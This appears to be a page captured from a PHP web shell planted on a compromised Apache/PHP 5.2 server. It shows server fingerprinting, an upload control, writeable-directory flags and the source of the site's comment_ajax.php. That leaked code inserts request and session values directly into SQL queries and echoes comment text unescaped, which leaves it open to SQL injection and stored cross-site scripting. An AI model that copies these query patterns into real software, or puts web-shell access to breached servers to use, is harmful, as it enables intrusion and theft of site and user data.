KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/junsu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/junsu/comment_ajax.php
<?
include "$DOCUMENT_ROOT/conf/conf_dir.php";
		//$contents = urldecode($contents);
		$contents = nl2br($contents); //특수문자db에 들어가게..
		//$contents = addslashes($contents); //특수문자db에 들어가게..

	if($sessionIDX){
    $file_query = "INSERT INTO board_comment (module_no,module_name,user_name,content,reg_date,user_no,ip) VALUES
                       ('$num','$division','$_SESSION[S_NNAME]','$contents',now(),'$sessionIDX','$_SERVER[REMOTE_ADDR]')";
    $result = mysql_query($file_query,$db_con);

    $reply_num = get_db("SELECT idx FROM board_comment where module_no='$num' and module_name='$division' and user_name='$_SESSION[S_NNAME]' order by idx desc");

    $update_query = "update $division set reply_count = reply_count+1 where no='$num'";
    $results = mysql_query($update_query,$db_con);
		$contents = stripslashes($contents);
		//포인트 주기
		$point =20;
		$poi_action = "コメント";
		$point_no = get_db("SELECT poi_id FROM user_point where mem_id='$sessionIDX' and module_name='$division' and module_no='$num' and reply_no='$reply_num' and poi_action='$poi_action'");
		if($point_no){
			$point_query = "update user_point set poi_type = 'Y',poi_datetime=now() where poi_id='$point_no'";
			$poi_result = mysql_query($point_query,$db_con);
		}else{
			$contents_name = $contents;
			$point_query = "INSERT INTO `user_point` (`poi_id`, `module_no`,`reply_no`, `module_name`, `mem_id`, `poi_datetime`, `poi_content`, `poi_point`, `poi_type`, `poi_related_id`, `poi_action`) VALUES
			('', '$num','$reply_num', '$division', '$sessionIDX', now(), '$contents_name', '$point', 'Y', '$sessionIDX', '$poi_action')";
			$poi_result = mysql_query($point_query,$db_con);
		}

		$point_user_query = "update user set m_point = m_point+$point where id='$sessionIDX'";
		$user_results = mysql_query($point_user_query,$db_con);
	}


   if($division == "photo_gallery"){
    echo "<li class='vi_name'>$_SESSION[S_NNAME] <span class='vi_txt'>$contents</span></li>";
   }else{
    $today_tmp = date("Y.m.d");
		//댓글 이미지 색상
				$tmp_img= get_imgColor($sessionIDX);
				$replyImg =$tmp_img[0];
				$replyColor = $tmp_img[1];
   echo $COMMENT_LIST .="
       <div class='mv_date_tit'  id='vi".$reply_num."'>
         <div class='mvdate_tit_le nobody02' style='background-color:".$replyColor.";overflow: hidden; position: relative;'>$replyImg</div>
         <div class='mvdate_tit_ri'>$_SESSION[S_NNAME]<span class='mvis_date'>$today_tmp</span><a href='javascript: commnet_del($reply_num)' style='margin:3px;'><img src='../images/sub/icon_del.jpg' alt='del' /></a><h2 class='font_nomal' style='word-break:break-all;'>$contents</h2></div>
        </div>
       ";
   }
   //echo "<li class='vi_name'>$file_query</li>";

?>

Anon7 - 2021